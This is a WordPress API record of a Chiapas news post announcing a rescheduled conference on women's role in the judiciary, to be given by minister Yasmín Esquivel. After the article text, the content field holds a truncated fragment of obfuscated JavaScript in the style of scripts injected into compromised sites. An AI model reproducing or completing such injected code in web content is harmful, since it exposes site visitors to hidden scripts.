{"id":20882,"date":"2025-03-12T05:41:57","date_gmt":"2025-03-12T05:41:57","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20882"},"modified":"2025-03-12T05:41:58","modified_gmt":"2025-03-12T05:41:58","slug":"poder-judicial-refuerza-su-compromiso-con-el-papel-clave-de-las-mujeres-en-la-justicia","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20882","title":{"rendered":"Poder Judicial refuerza su compromiso con el papel clave de las mujeres en la justicia"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"675\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250311-WA0046-1024x675.jpg\" alt=\"\" class=\"wp-image-20883\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250311-WA0046-1024x675.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250311-WA0046-300x198.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250311-WA0046-768x506.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250311-WA0046-1536x1012.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250311-WA0046-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250311-WA0046.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>-Este 28 de marzo, se impartir\u00e1 la conferencia El papel de la mujer en el Poder Judicial\u201d por la ministra Yasm\u00edn Esquivel.<\/p>\n\n\n\n<p>11 de marzo del 2025. El Poder Judicial del Estado de Chiapas informa el cambio de fecha de la realizaci\u00f3n de la conferencia magistral titulada \u201cEl papel de la mujer en el Poder Judicial\u201d, que ser\u00e1 impartida por la ministra de la Suprema Corte de Justicia de la Naci\u00f3n, Yasm\u00edn Esquivel Mossa, la cual se efectuar\u00e1 este 28 de marzo.<\/p>\n\n\n\n<p>Desde las instalaciones del palacio de justicia de Tuxtla Guti\u00e9rrez, esta conferencia ofrecer\u00e1, desde el punto de vista de la ministra Yasm\u00edn Esquivel, su experiencia sobre los desaf\u00edos y avances de las mujeres en el \u00e1mbito judicial, subrayando la relevancia de su inclusi\u00f3n en los procesos de toma de decisiones en el pa\u00eds.<\/p>\n\n\n\n<p>Esta actividad que se realizar\u00e1 de manera presencial y gratuita, cobra relevancia gracias a la trayectoria de la ministra con m\u00e1s de 20 a\u00f1os en el \u00e1mbito judicial, quien se ha distinguido por su incansable lucha en la defensa y promoci\u00f3n de los derechos humanos, por lo que su compromiso con la justicia social y la equidad, le otorgan una visi\u00f3n \u00fanica que enriquecer\u00e1 sin duda el an\u00e1lisis de este tema.<\/p>\n\n\n\n<p>Con esta ponencia, el Poder Judicial reafirma su labor impulsando la equidad de g\u00e9nero, la igualdad y la promoci\u00f3n de los derechos de las ni\u00f1as, adolescentes y mujeres chiapanecas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. -Este 28 de marzo, se impartir\u00e1 la conferencia El papel de la mujer en el Poder Judicial\u201d por la ministra Yasm\u00edn Esquivel. 11 de marzo del 2025. El Poder Judicial del Estado de Chiapas informa el cambio de fecha de la realizaci\u00f3n de la conferencia magistral titulada \u201cEl papel de la mujer en el &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20883,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-20882","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20882","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20882"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20882\/revisions"}],"predecessor-version":[{"id":20884,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20882\/revisions\/20884"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20883"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20882"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20882"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20882"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}